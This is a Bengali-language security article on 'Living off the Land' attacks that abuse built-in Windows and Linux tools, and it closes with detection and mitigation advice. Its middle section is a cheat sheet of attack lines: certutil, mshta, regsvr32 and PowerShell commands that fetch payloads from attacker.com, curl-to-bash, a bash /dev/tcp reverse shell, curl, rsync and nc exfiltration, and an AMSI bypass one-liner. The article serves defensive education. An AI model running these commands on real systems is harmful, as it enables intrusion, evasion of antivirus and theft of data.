Living off the Land: ওএসের বৈধ টুল ব্যবহার করে অ্যান্টিভাইরাসকে ফাঁকি দিয়ে হ্যাকিং!

"Living off the Land" শব্দটি মূলত সামরিক ভাষা থেকে এসেছে, যেখানে সৈনিকরা স্থানীয় সম্পদ ব্যবহার করে টিকে থাকে। সাইবার নিরাপত্তায় এর অর্থ হলো আক্রমণকারীরা টার্গেট সিস্টেমে ইতিমধ্যে উপস্থিত টুল ব্যবহার করে আক্রমণের প্রতিটি ধাপ - Reconnaissance, Lateral Movement, Persistence, Data Exfiltration - সম্পন্ন করে।

এই কৌশলের প্রধান সুবিধাগুলো হলো:

প্রথমত, Signature-based Detection এড়ানো - কারণ ব্যবহৃত Binary গুলো Microsoft, Red Hat বা অন্যান্য Trusted Vendor-এর Signed Binary, তাই Antivirus এগুলো Block করে না।

দ্বিতীয়ত, Behavioral Detection জটিল করা - একজন System Administrator যেসব কমান্ড নিয়মিত চালান, আক্রমণকারীও সেগুলোই চালায়, ফলে অস্বাভাবিক কিছু মনে হয় না।

তৃতীয়ত, Forensics কঠিন করা - কারণ কোনো Custom Binary সিস্টেমে থাকে না, ফলে File-based Forensics-এর সুযোগ সীমিত হয়ে যায়।

LOLBAS Project (Living Off The Land Binaries, Scripts and Libraries) এবং GTFOBins (Linux-এর জন্য) এই কৌশলগুলো ডকুমেন্ট করার জন্য পরিচালিত। এই Projects-এ Microsoft-signed Binary-গুলোর তালিকা পাওয়া যায় যেগুলো আক্রমণকারীদের জন্য কাজে লাগে।

Windows-এ অসংখ্য Built-in Binary রয়েছে যা আক্রমণকারীরা অপব্যবহার করে। সবচেয়ে কুখ্যাত কিছু LOLBins:

certutil.exe

মূলত Certificate Management-এর জন্য, কিন্তু এটি ফাইল ডাউনলোড, Encoding/Decoding-এ ব্যবহৃত হতে পারে:

certutil.exe -urlcache -split -f http://attacker.com/payload.exe payload.exe
certutil.exe -decode encoded.txt decoded.exe

mshta.exe

Microsoft HTML Application Host - এটি দূরবর্তী HTA ফাইল চালাতে পারে যা VBScript বা JScript থাকে:

mshta.exe http://attacker.com/malicious.hta

regsvr32.exe (Squiblydoo Attack)

Registry-তে DLL Register করার জন্য, কিন্তু Remote scriptlet চালানোর জন্য অপব্যবহার করা যায়:

regsvr32.exe /s /n /u /i:http://attacker.com/file.sct scrobj.dll

bitsadmin.exe এবং powershell.exe

BITS (Background Intelligent Transfer Service) দিয়ে নির্দিষ্ট Persistence এবং File Download সম্ভব। PowerShell-এর সব কথা আলাদা - এটি এতটাই শক্তিশালী যে প্রায় যেকোনো আক্রমণ এর মাধ্যমে সম্পাদন করা যায়।

IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')

rundll32.exe

DLL থেকে একটি নির্দিষ্ট Function এক্সিকিউট করার জন্য:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new ActiveXObject("WScript.Shell").Run("calc.exe")

WMIC এবং schtasks.exe

WMIC দিয়ে Remote Execution, এবং schtasks দিয়ে Persistence:

wmic process call create "cmd.exe /c calc.exe"
schtasks /create /tn "Backup" /tr "C:\path\to\payload.exe" /sc daily /st 09:00

Linux পরিবেশেও LotL সমান কার্যকর। GTFOBins ক্যাটালগ Linux Binary-গুলোর Abuse Method ডকুমেন্ট করে। কিছু সাধারণ উদাহরণ:

curl এবং wget

ফাইল ডাউনলোড ও Exfiltration:

curl http://attacker.com/payload.sh | bash
wget http://attacker.com/tools.tar.gz -O - | tar xz

bash, awk, এবং python

Reverse Shell তৈরি:

bash -i >& /dev/tcp/attacker.com/4444 0>&1
awk 'BEGIN {s = "/inet/tcp/0/attacker.com/4444"; while(1) { ...}}'
python3 -c 'import socket,subprocess,os;s=socket.socket(...);'

scp, rsync, এবং base64

Data Exfiltration:

base64 sensitive.db | curl -X POST -d @- http://attacker.com/upload
rsync -avz /etc/ [email protected]:/loot/

find এবং tar

বহু-উদ্দেশ্যে ব্যবহৃত:

find / -name "*.key" 2>/dev/null
tar -czf - /home | nc attacker.com 4444

বিশ্বের বিভিন্ন উন্নত হুমকি গোষ্ঠী LotL কৌশল ব্যাপকভাবে ব্যবহার করে। কিছু উল্লেখযোগ্য উদাহরণ:

APT29 (Cozy Bear), রাশিয়ান গোয়েন্দা সংস্থা SVR-এর সাথে সংযুক্ত, SolarWinds আক্রমণে PowerShell এবং WMI বহুল ব্যবহার করেছিল। তারা Custom Malware-এর পাশাপাশি Native Windows Binary দিয়ে Lateral Movement এবং Discovery চালিয়েছিল।

APT41 (Double Dragon), চীনা গোয়েন্দা সংস্থার সাথে সম্পর্কিত, বহু বছর ধরে certutil, mshta, এবং rundll32-এর Abuse চালাচ্ছে।

Volt Typhoon, একটি চীনা State-sponsored Group, US-এর Critical Infrastructure (Energy, Water, Communications) লক্ষ্য করে প্রায় সম্পূর্ণভাবে LotL ভিত্তিক আক্রমণ চালিয়েছিল। তাদের কৌশল এতটাই গোপন ছিল যে কয়েক বছর ধরে সনাক্ত হয়নি। CISA এবং NSA-র একটি Joint Advisory-তে এই গ্রুপের কৌশল বিস্তারিত বর্ণনা করা হয়েছে।

FIN7, একটি অর্থনৈতিকভাবে অনুপ্রাণিত গোষ্ঠী, Restaurant এবং Retail সেক্টরে আক্রমণ করার সময় বিভিন্ন LOLBins ব্যবহার করেছিল।

PowerShell আধুনিক Windows আক্রমণের কেন্দ্রবিন্দুতে অবস্থান করছে। এর কারণ:

1. প্রায় সমস্ত Windows সিস্টেমে ডিফল্টভাবে ইনস্টল থাকে
2. .NET Framework-এর সম্পূর্ণ অ্যাক্সেস থাকে
3. Memory-তে Script চালানো যায়, Disk-এ ফাইল লিখতে হয় না
4. Microsoft এটিকে Trusted মনে করে

PowerShell-ভিত্তিক আক্রমণ ফ্রেমওয়ার্কের মধ্যে রয়েছে Empire (এখন BC-Security maintained), PowerSploit, Nishang, এবং PoshC2। AMSI (Antimalware Scan Interface) এবং Constrained Language Mode থাকা সত্ত্বেও, আক্রমণকারীরা ক্রমাগত নতুন Bypass কৌশল উদ্ভাবন করছে।

একটি সাধারণ AMSI Bypass:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

PowerShell Logging সক্ষম থাকলে এই ধরনের আক্রমণ Module Logging বা Script Block Logging-এর মাধ্যমে ধরা পড়তে পারে।

LotL আক্রমণ শনাক্ত করা কঠিন কিন্তু অসম্ভব নয়। মূল চ্যালেঞ্জ হলো Legitimate এবং Malicious কার্যকলাপের মধ্যে পার্থক্য করা। কিছু কার্যকর Detection কৌশল:

Behavioral Analysis এবং Baseline

প্রতিটি সিস্টেমের জন্য Normal Behavior-এর Baseline তৈরি করতে হবে। certutil যদি একটি Workstation-এ কখনো ব্যবহৃত না হয়, তাহলে হঠাৎ এটি ব্যবহার একটি Anomaly। User এবং Entity Behavior Analytics (UEBA) সলিউশন এই কাজে সাহায্য করে।

Command Line Logging

Windows-এ Process Creation Auditing (Event ID 4688) এর Command Line Arguments সহ সক্ষম করতে হবে। Linux-এ auditd দিয়ে execve syscall লগ করতে হবে। তারপর SIEM-এ Sigma Rule দিয়ে সন্দেহজনক Pattern অনুসন্ধান করতে হবে।

Parent-Child Process Relationship

Word document থেকে PowerShell চালু হওয়া স্বাভাবিক নয়। MS Office Application-এর Child Process মনিটর করলে অনেক Phishing-ভিত্তিক আক্রমণ ধরা যায়। Sysmon Event ID 1 এই তথ্য সরবরাহ করে।

Network-based Detection

LotL আক্রমণে Network Traffic-এ certutil বা PowerShell-এর User-Agent String, অস্বাভাবিক Outbound Connection, বা Beaconing Pattern থাকতে পারে। NDR (Network Detection and Response) সলিউশন এগুলো শনাক্ত করতে পারে।

Sysmon এবং EDR

Microsoft Sysinternals-এর Sysmon টুল বিস্তারিত Process এবং Network Logging প্রদান করে। SwiftOnSecurity-র Default Sysmon Configuration একটি ভালো শুরু। আধুনিক EDR যেমন CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint, এবং Carbon Black ML-ভিত্তিক LotL Detection প্রদান করে।

LotL আক্রমণ সম্পূর্ণভাবে প্রতিরোধ করা অসম্ভব, কারণ Built-in টুল ব্যবহার বন্ধ করলে System Administrator-দের কাজ ব্যহত হবে। কিন্তু কিছু কৌশল আক্রমণের সুযোগ কমাতে পারে:

Application Whitelisting: Microsoft AppLocker বা Windows Defender Application Control (WDAC) দিয়ে শুধু অনুমোদিত Binary চালানোর অনুমতি দেওয়া। মূল উদ্দেশ্য হলো অপ্রয়োজনীয় Binary Disable করা।

PowerShell Constrained Language Mode: PowerShell-এ Constrained Language Mode সক্ষম করলে অনেক আক্রমণ কৌশল কাজ করে না।

Script Block Logging এবং Transcription: PowerShell-এর সমস্ত কার্যকলাপ লগ করতে হবে এবং SIEM-এ পাঠাতে হবে।

Least Privilege: ব্যবহারকারীদের Local Admin অধিকার থাকা উচিত নয়। Just-in-Time Access এবং PAM (Privileged Access Management) ব্যবহার করতে হবে।

Network Segmentation: Lateral Movement কঠিন করতে নেটওয়ার্ক Segment করতে হবে। Zero Trust Architecture প্রয়োগ করতে হবে।

Threat Hunting: SOC দলকে নিয়মিত Threat Hunting Exercise চালাতে হবে। MITRE ATT&CK Framework-এর LotL সম্পর্কিত Technique (T1218, T1059, ইত্যাদি) অনুসরণ করতে হবে।

User Awareness: Phishing-ই LotL আক্রমণের সবচেয়ে সাধারণ প্রবেশদ্বার। User Training দিয়ে Macro Document বা Suspicious Link থেকে সাবধান করতে হবে।